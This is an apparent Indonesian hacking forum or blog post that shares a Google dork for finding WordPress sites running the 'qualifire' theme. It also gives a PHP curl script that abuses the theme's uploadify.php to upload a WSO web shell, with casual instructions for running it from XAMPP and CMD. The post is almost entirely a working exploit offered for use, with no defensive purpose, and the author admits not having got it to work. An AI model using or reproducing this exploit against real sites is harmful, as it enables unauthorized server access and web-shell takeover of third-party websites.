Dork :
- inurl:wp-content/themes/qualifire
exploit:
http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
simpan ini dengan extensi (.php)
contoh: aplod.php
$uploadfile="wso.php";
$ch = curl_init("http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile", 'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
keterangan:
wso.php =shell yang mau kita upload :D
http://site.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php = target ente :v
simpan:
- aplod.php
- wso.php
di xampp/php
setelah itu buka dengan CMD. :v
ku juga blm dapet.. tapi sharing aja lahh :v
EmoticonEmoticon